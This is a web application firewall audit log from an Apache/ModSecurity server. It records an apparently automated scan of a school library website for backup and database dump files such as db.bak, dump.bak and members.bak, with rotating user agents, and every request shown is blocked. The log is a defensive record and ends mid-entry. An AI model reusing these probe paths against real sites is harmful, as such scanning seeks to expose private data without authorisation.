Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a14ef045-Z-- --1ad2fe5e-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cS-QAAAJM 103.236.140.4 58354 103.236.140.4 8181 --1ad2fe5e-B-- GET /dat.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.83 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224766 --1ad2fe5e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1ad2fe5e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883423104 1771 (- - -) Stopwatch2: 1747543883423104 1771; combined=769, p1=404, p2=337, p3=0, p4=0, p5=28, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ad2fe5e-Z-- --4c86882a-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o83QAAABI 103.236.140.4 56796 103.236.140.4 8181 --4c86882a-B-- GET /db.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 OPR/56.0.3051.43 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151093470 --4c86882a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4c86882a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883422809 2388 (- - -) Stopwatch2: 1747543883422809 2388; combined=888, p1=396, p2=455, p3=0, p4=0, p5=37, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c86882a-Z-- --3968f158-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o83gAAAAw 103.236.140.4 56796 103.236.140.4 8181 --3968f158-B-- GET /erpustakaan_smkn22jakarta_sch_id.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224769 --3968f158-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3968f158-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883429621 1647 (- - -) Stopwatch2: 1747543883429621 1647; combined=685, p1=325, p2=331, p3=0, p4=0, p5=28, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3968f158-Z-- --cd73b52f-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o84AAAAAE 103.236.140.4 56796 103.236.140.4 8181 --cd73b52f-B-- GET /erpustakaan.smkn22jakarta.sch.id.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151093489 --cd73b52f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --cd73b52f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".smkn22jakarta.sch.id.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883571158 2195 (- - -) Stopwatch2: 1747543883571158 2195; combined=896, p1=379, p2=477, p3=0, p4=0, p5=40, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd73b52f-Z-- --4f98e379-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o84QAAABA 103.236.140.4 56796 103.236.140.4 8181 --4f98e379-B-- GET /2020.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151093498 --4f98e379-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4f98e379-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883585541 1605 (- - -) Stopwatch2: 1747543883585541 1605; combined=641, p1=316, p2=299, p3=0, p4=0, p5=26, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f98e379-Z-- --02b5fe20-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cS-gAAAJU 103.236.140.4 58354 103.236.140.4 8181 --02b5fe20-B-- GET /erpustakaan.smkn22jakarta.sch.id.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36 OPR/56.0.3051.104 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224795 --02b5fe20-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --02b5fe20-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".smkn22jakarta.sch.id.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883587238 2638 (- - -) Stopwatch2: 1747543883587238 2638; combined=952, p1=442, p2=480, p3=0, p4=0, p5=30, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02b5fe20-Z-- --23a8d537-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cS_QAAAJc 103.236.140.4 58354 103.236.140.4 8181 --23a8d537-B-- GET /smkn22jakarta.sch.id.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2; rv:67.0) Gecko/20100101 Firefox/67.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 70090975 --23a8d537-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --23a8d537-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".sch.id.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883651793 1917 (- - -) Stopwatch2: 1747543883651793 1917; combined=718, p1=336, p2=354, p3=0, p4=0, p5=28, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23a8d537-Z-- --3e2f4537-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cS_wAAAIk 103.236.140.4 58354 103.236.140.4 8181 --3e2f4537-B-- GET /dump.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:60.5.0) Gecko/20100101 Firefox/60.5.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151093545 --3e2f4537-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3e2f4537-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883704604 1793 (- - -) Stopwatch2: 1747543883704604 1793; combined=667, p1=312, p2=328, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e2f4537-Z-- --3ddc9035-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cTAAAAAIw 103.236.140.4 58354 103.236.140.4 8181 --3ddc9035-B-- GET /2017.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36 OPR/56.0.3051.99 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 70091000 --3ddc9035-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3ddc9035-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883712508 1738 (- - -) Stopwatch2: 1747543883712508 1738; combined=630, p1=304, p2=299, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ddc9035-Z-- --df5f6e58-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o84gAAABc 103.236.140.4 56796 103.236.140.4 8181 --df5f6e58-B-- GET /back.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224819 --df5f6e58-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --df5f6e58-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883714130 1983 (- - -) Stopwatch2: 1747543883714130 1983; combined=727, p1=367, p2=333, p3=0, p4=0, p5=27, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df5f6e58-Z-- --2e5d7619-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cTAwAAAIg 103.236.140.4 58354 103.236.140.4 8181 --2e5d7619-B-- GET /wwwroot.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.3.0) Gecko/20100101 Firefox/52.3.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151093557 --2e5d7619-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2e5d7619-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883724493 1745 (- - -) Stopwatch2: 1747543883724493 1745; combined=642, p1=313, p2=302, p3=0, p4=0, p5=27, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e5d7619-Z-- --13f65812-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o84wAAABg 103.236.140.4 56796 103.236.140.4 8181 --13f65812-B-- GET /members.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4; rv:52.0.2) Gecko/20100101 Firefox/52.0.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224822 --13f65812-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --13f65812-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883718061 14617 (- - -) Stopwatch2: 1747543883718061 14617; combined=26579, p1=321, p2=436, p3=0, p4=0, p5=12925, sr=67, sw=0, l=0, gc=12897 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13f65812-Z-- --16cbb175-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cTBQAAAIo 103.236.140.4 58354 103.236.140.4 8181 --16cbb175-B-- GET /faisunzip.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:60.5.2) Gecko/20100101 Firefox/60.5.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 123177302 --16cbb175-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --16cbb175-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883766910 2078 (- - -) Stopwatch2: 1747543883766910 2078; combined=741, p1=351, p2=363, p3=0, p4=0, p5=27, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16cbb175-Z-- --8aee5513-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o85AAAAAU 103.236.140.4 56796 103.236.140.4 8181 --8aee5513-B-- GET /root.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626 Safari/537.36 OPR/56.0.3051.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224825 --8aee5513-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8aee5513-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883804367 1797 (- - -) Stopwatch2: 1747543883804367 1797; combined=668, p1=338, p2=302, p3=0, p4=0, p5=28, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8aee5513-Z-- --e8ecc857-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o85QAAAAY 103.236.140.4 56796 103.236.140.4 8181 --e8ecc857-B-- GET /bak.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224832 --e8ecc857-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e8ecc857-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883816261 1819 (- - -) Stopwatch2: 1747543883816261 1819; combined=675, p1=349, p2=300, p3=0, p4=0, p5=26, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e8ecc857-Z-- --bd621a30-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o85wAAAA8 103.236.140.4 56796 103.236.140.4 8181 --bd621a30-B-- GET /user.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151093599 --bd621a30-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --bd621a30-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883823459 1638 (- - -) Stopwatch2: 1747543883823459 1638; combined=641, p1=316, p2=297, p3=0, p4=0, p5=28, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bd621a30-Z-- --0d360638-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o86QAAAAM 103.236.140.4 56796 103.236.140.4 8181 --0d360638-B-- GET /2024.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/52.0.2871.64 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151093616 --0d360638-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close 